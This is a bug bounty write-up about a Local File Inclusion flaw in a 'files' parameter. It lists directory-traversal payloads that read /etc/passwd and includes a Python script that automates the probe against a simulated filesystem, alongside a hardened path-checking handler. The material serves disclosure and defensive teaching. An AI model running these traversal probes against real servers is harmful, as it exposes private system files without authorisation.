Local File Inclusion (Basic)
I started to re-read the reasons why LFI still exists on modern websites and the security mechanisms used to prevent these bugs. If LFI (Local File Inclusion) is new to you and you don't really know how this bug can be exploited, I suggest you read about it in detail at https://highon.coffee/blog/lfi-cheat-sheet/. It will surely help you get your hands on this bug.
This article is a follow-up to that cheat sheet. I was able to replicate this bug on a private bug bounty website. The cheat sheet mentions that "file" parameters are one of the many parameters which may be vulnerable to this attack.
For example : foo.php?file=image.jpg
SOURCE: Highon.coffee
The attacker only needs to get 'image.jpg' replaced with his or her payload.
In my case the URL looked like this:
https://www.vulnerableweb.com/index.php/asset/getjs?files=[Vulnerable Parameter]&v=22
The files parameter here was being used to include external JS files from other domains.
This parameter was first vulnerable to an SSRF attack. On my report they replied that this was known and intended behaviour, and they wanted it to be like this. I moved on to exploiting it further to check what else could be achieved with this parameter.
Simply trying to include '/etc/passwd' showed nothing. What was required here was to perform a directory traversal one level at a time, to find the path relative to which these files were being resolved.
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd ← Correct Path
On supplying the correct path to the parameter, the contents of "/etc/passwd" were displayed on the page.
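The walk-up-one-level-at-a-time probe above is easy to automate, and the same code can show why the fix is a canonical-path check rather than a blocklist of "../". The script below is an added example written for this article, not the author's tooling and not the target's code: the include root, the fake filesystem and the hostname are constructed stand-ins (the host is the placeholder from the writeup), chosen so that the fifth traversal is the one that lands on /etc/passwd, as it did on the real target. vulnerable_include() models an unchecked include of the files= parameter; hardened_include() is the corrected handler.

```python
import os
import re
from urllib.parse import urlencode

# Constructed stand-in for the target's filesystem (not real data).
FAKE_FS = {
    "/etc/passwd": (
        "root:x:0:0:root:/root:/bin/bash\n"
        "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    ),
    "/var/www/html/assets/js/app.js": "console.log('app');\n",
}

# Hypothetical include root, five directories below "/", so that exactly
# five "../" segments are needed to reach /etc/passwd (as on the real target).
INCLUDE_ROOT = "/var/www/html/assets/js"

# Signature of a leaked /etc/passwd: the root account line.
PASSWD_MARKER = re.compile(r"^root:x:0:0:", re.MULTILINE)


def vulnerable_include(files_param: str) -> str:
    """Model of the vulnerable handler: join the user value onto the include
    root and read whatever path results, like an unchecked include()."""
    path = os.path.normpath(os.path.join(INCLUDE_ROOT, files_param))
    return FAKE_FS.get(path, "")


def hardened_include(files_param: str) -> str:
    """Fixed handler: canonicalise first, then refuse any path that does not
    stay under INCLUDE_ROOT. Catches "../" chains and absolute paths alike,
    which a naive "../" string filter would not."""
    path = os.path.normpath(os.path.join(INCLUDE_ROOT, files_param))
    if os.path.commonpath([INCLUDE_ROOT, path]) != INCLUDE_ROOT:
        raise ValueError("path traversal rejected: %r" % files_param)
    return FAKE_FS.get(path, "")


def traversal_payloads(target: str = "etc/passwd", max_depth: int = 10):
    """Yield ../etc/passwd, ../../etc/passwd, ... up to max_depth levels."""
    for depth in range(1, max_depth + 1):
        yield depth, "../" * depth + target


def probe(include, max_depth: int = 10):
    """Walk up one directory per request; return (depth, payload) for the
    first response that looks like /etc/passwd, or None if nothing leaked."""
    for depth, payload in traversal_payloads(max_depth=max_depth):
        try:
            body = include(payload)
        except ValueError:
            return None  # hardened handler rejected the traversal
        if PASSWD_MARKER.search(body):
            return depth, payload
    return None


def build_url(payload: str) -> str:
    """Request URL in the writeup's shape; the host is a placeholder."""
    query = urlencode({"files": payload, "v": "22"}, safe="/")
    return "https://www.vulnerableweb.com/index.php/asset/getjs?" + query


if __name__ == "__main__":
    hit = probe(vulnerable_include)
    if hit:
        print("leaked at depth %d via %s" % (hit[0], build_url(hit[1])))
    print("hardened handler leaks:", probe(hardened_include))
```

Against the simulated handler the probe stops at depth 5, matching the payload in the list above; against the hardened handler it gets nothing, and the legitimate app.js include still works. Note that a real fix for this endpoint also has to deal with the remote-inclusion side the author mentions (the parameter fetched JS from other domains), which a path check alone does not cover; an allowlist of permitted hosts or, better, local files only, is the usual answer.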
Similarly, this parameter was also vulnerable to the following:
XSS (Cross Site Scripting)
Command Injection
RFI (Remote File Inclusion)
That’s all for this bug.
Update
This bug has been patched and I've been awarded a $200 bounty.
Thanks for reading!